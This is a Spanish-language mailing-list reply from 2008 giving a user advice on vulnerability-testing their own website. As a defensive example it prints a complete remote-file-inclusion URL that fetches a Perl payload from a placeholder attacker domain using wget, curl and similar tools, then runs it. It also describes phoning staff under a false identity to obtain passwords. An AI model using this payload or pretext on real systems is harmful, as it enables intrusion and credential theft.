Ethical Hacking, aspectos a considerar.

Alberto Rivera rivera.alberto en gmail.com
Vie Ene 18 17:34:22 CLST 2008


Asdtaker wrote:
> Estimados, alguien tiene idea de los aspecto de debiese considerar a la hora
> de realizar un escaneo de vulnerabilidades a mi sitio web?
>
> Por ahora considero estos ITEMs:
>
> - Ingenieria Social: informacion disponible en la web.
> - Archivos por defecto: todo aquello que viene con la instalacion en bruto
> del server web.
> - Extensiones por defecto: analizar el impacto de soportar distintas
> extensiones.
> - Sesiones: comprobar validez de sesiones, etc.
> - Manejo de errores: de aplicacion y servidor.
> - SQL Injection.
>
>
> Gracias por sus comentarios.
>   
Mira toma nessus y lo corres desde el exterior y después desde el 
interior de la organización esto te va a encontrar varias 
vulnerabilidades y sus niveles de vulnerabilidad, luego tomas nmap y 
tratar de insertar exploits conocidos a servicios conocidos desde dentro 
y afuera cada vez, prueba varias herramientas en contra de tu sitio, 
trata de explotarlo de forma controlada, o sea, no lo hagas cuando estén 
todos trabajando ...  esto te va a entregar una visión un poco más 
específica de cualquier problemática que puedas tener.  Ahora para el 
desarrollo propiamente tal, prueba inyecciones de mysql, php y 
vulnerabilidades de javascript o ajax o lo que tengas, para hacer 
inyecciones de forma remota hay varias formas de hacerlo y están super 
documentadas incluso en youtube puedes encontrar videos bastante buenos 
...  a nivel de servidor elimina cualquier software que sirva para bajar 
cosas del internet para que no te puedan ejecutar ningún código dentro 
de la máquina y para que imposibilites a los atacantes a hacer cosas 
como esta :

http://tudominio/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=
1&GLOBALS=&mosConfig_absolute_path=http://dominiousadoporelatacante/directorioherramientas/tool25.txt?&cmd=cd%20/tmp;
wget%20http://dominiousadoporelatacante/directorioherramientas/spkat.txt;
curl%20-O%20http://dominiousadoporelatacante/directorioherramientas/spkat.txt;
lwp-download%20-a%20http://dominiousadoporelatacante/directorioherramientas/spkat.txt;
GET%20http://dominiousadoporelatacante/directorioherramientas/spkat.txt;
lynx%20-source%20http://dominiousadoporelatacante/directorioherramientas/spkat.txt;
links%20-source%20http://dominiousadoporelatacante/directorioherramientas/spkat.txt;
perl%20spkat.txt

si te fijas aquí el atacante no se fija ni en ingeniería social ni en 
datos de ningún tipo sólo hace un ataque vía sitio web, y ve si tu sitio 
tiene permiso de ejecutar cualquiera de las aplicaciones de descarga o 
navegación, con esto baja un paquete, para el ejemplo spkat.txt y 
después lo ejecuta con perl. El spkat lo que hace es abrir puertos, 
levantar servicios, ejecutar troyanos dentro de la máquina o cualquier 
cosa ....

Ahora lo de la ingeniera social es para cuestiones super puntuales por 
ejemplo, para conseguir acceso a un sistema en red, por ejemplo llamas a 
la secretaria de administración y le dices que eres el gerente de 
operaciones y le pides un nombre de usuario y password del sistema, así 
puedes ver realmente cual es el nivel de seguridad que cuentas de parte 
de los usuarios ... pero la ing. social no es encontrar información en 
internet.

eso, espero te sirva

salu2
>
>
>
>
>   



Más información sobre la lista de distribución Linux